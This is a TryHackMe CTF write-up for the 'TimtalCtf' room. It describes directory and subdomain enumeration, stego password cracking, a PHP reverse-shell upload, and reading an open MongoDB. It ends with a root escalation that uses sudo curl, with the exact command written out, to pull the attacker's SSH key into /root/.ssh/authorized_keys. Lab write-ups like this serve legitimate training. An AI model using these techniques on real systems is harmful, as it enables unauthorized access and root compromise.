[EN] TryHackMe TimtalCtf WriteUp
Room link: tryhackme.com/jr/timtalctf
The first thing we should do is to scan the port. According to the nmap results, only the ports 21, 22 and 80 are open. There are no exploits for any services.
Then, when we visit the web page, an Apache default page appears. When we examine the source code of that page, we can see the ‘/d3v3l0pm3nt’ comment. Then we visit path /d3v3l0pm3nt but we can’t see such a page.
Now, it’s time for the directory scan. In order to do that, I usually prefer using Gobuster, but you can use any other tool. After a while, Gobuster would find the directory ‘/d*********t’.
When we visit that page, we can find a text file named “dontforgetit.txt”.
It is a note that contains the FTP credentials and our first flag (base32 encoded).
Then, we should log into the FTP with those credentials. When we log in, we find a ZIP file and a note. After that, we need to transfer those files to our local system. When we try to extract that ZIP file, it asks for a password. The password is in the note we have just found in the FTP .
Now, we have another file named “lobby.jpg”. We should use the Steghide to check and see if there is hidden data. Yes, we have found a data, but it is password protected! To crack the password protection, we need to use a tool named “Stegseek”. Within a few seconds, Stegseek cracks our password using the wordlist “rockyou”.
Now, we have an another text file. When we read it, we understand that this text file is admin’s to-do list. In this way, we reach another hidden directory: /t3**-u*****-***.
When we visit this page, it says “this page is temporarily moved”. But on the bottom line, we have an email address that looks like something interesting. It (timtal.thm) seems like a virtualhost domain. Then we consider it might also have a subdomain. Now, it’s time for subdomain scan!
But before the subdomain scan, we must add ‘timtal.thm’ domain to our ‘hosts’ file. It is required because ctf machine’s ip and timtal.thm domain should be equal in our local machine for subdomain scan. You will probably be using linux-based system while solving this ctf, so I am going to explain it for linux systems.
First, open /etc/hosts file with root permissions using any text editor. Then go to the undermost line and write ctf machine’s ip (space) and ‘timtal.thm’. Then, save and quit. Now that I have given necessary information for the linux-based system, we can start the subdomain scan!
In order to complete this subdomain scan correctly, I should use a tool named “WFUZZ”. But again, you can also use Gobuster. Shortly after starting the scan, we find the subdomain t***.timtal.thm. Of course, we have to add this subdomain to the /etc/hosts file.
After hosts file editing process, we visit the subdomain and we can see moved “test-upload” directory is here. Using upload vulnerability, we can access to the system. Grab a php reverse shell (I’ll use pentest monkey’s one), then edit ip and port for your machine, finally upload it!
When we upload the payload, we can’t know where these files are stored exactly. To find them, we need to start a new directory scan for this new subdomain. After a while, Gobuster will find the directory ‘/u******’.
When we visit the directory, we can see our payload (and some other payloads that I forgot to delete while building this machine :/). Listen to the port that you have written in order to payload by using netcat. Then, execute the payload from /u****** directory and voila!. We have a shell access :)
Now, I am going to spawn tty shell , normally its not necessary. But if you don’t want some annoying problems with non-tty shell, it might be a good choice :) To make it, simply google it :D Now, we reached to the system, but we are not a normal user. We are www-data user which is unauthorized. This user can only run web applications which Apache has. It is a simple security precaution. So we don’t have any sudo permissions.If we navigate the system for a while, we can find a directory named “notes” in “/” directory. At first, it might seem empty, but when we look inside ( if you list all directories [ls -a]), we will find the ‘.note’ file.
This is a note that root wrote for the user. According to this note, mongodb is installed to the machine, but there is no password protection ¯\_(ツ)_/¯.
Now, we should log in by typing “mongo”, and then we need to type “show databases;” in order to list the databases. There is a different database named “timtal”. Let’s check it. To select the database, type “use timtal;”. Then list collections (equivalent to tables in mysql) using “show collections;”. There are 2 different collections. One of them is our second flag (encoded with hex), the other one is password of user timtal. To read the collections, use “ db.<collectionName>.find();”.
Let’s exit from mongodb and login to timtal user.
In the user’s home directory, we will find our 3. flag :)
In the end, there is only the root flag left. Because at the moment, we have a normal user, so we might have some sudo permissions. Let’s check it by using ‘sudo -l’.
Here we understand that, user timtal can run “curl” tool with root permissions. When we think about how we can do a privilege escalation process with this permission, we discover that we can’t execute files with ‘curl’, so we can’t get to the root shell directly. According to ‘GTFOBins’, we can save files with any name and in any location with ‘-o’ extension. However, we still can’t execute. After a little brainstorming, we realize that we can put our ‘ssh key’ to the root’s authorized keys. If we try to log in with that key, it won’t ask for any passwords. Root’s “authorized keys” file is “/root/.ssh/authorized_keys”.
In order to do this, first we need to stream files to ctf machine. We can’t curl it from internet because this machines are only connected with each other. So, we should first go to the our user’s directory, then, the “.ssh” directory, and find the “id_rsa.pub” file (in our local machine). If it doesn’t exist, we have to create one by just typing ‘ssh-keygen -t rsa’. Now, we are going to stream this generated ssh key with the CTF machine. Make sure that you are in the “.ssh” directory and type ‘python3 -m http.server’. This command will stream “.ssh” directory in the local network using ‘http protocol from port 8000’.
Now, go back to the ctf machine. We are going to get our ssh key and save it to “/root/.ssh/” as “authorized_keys”. In order to do this, type;
sudo curl http://ip:8000/id_rsa.pub -o /root/.ssh/authorized_keysLet’s try to log in with our key :) But this time, we have to use id_rsa file. Not the id_rsa.pub.
ssh root@machineip -i id_rsaAnd without typing any passwords, we have logged in as root :D
Then, we can find our last flag in /root directory.
Thanks for reading :) Follow for more CTFs.
Writeup by Ömer Faruk SÖNMEZ
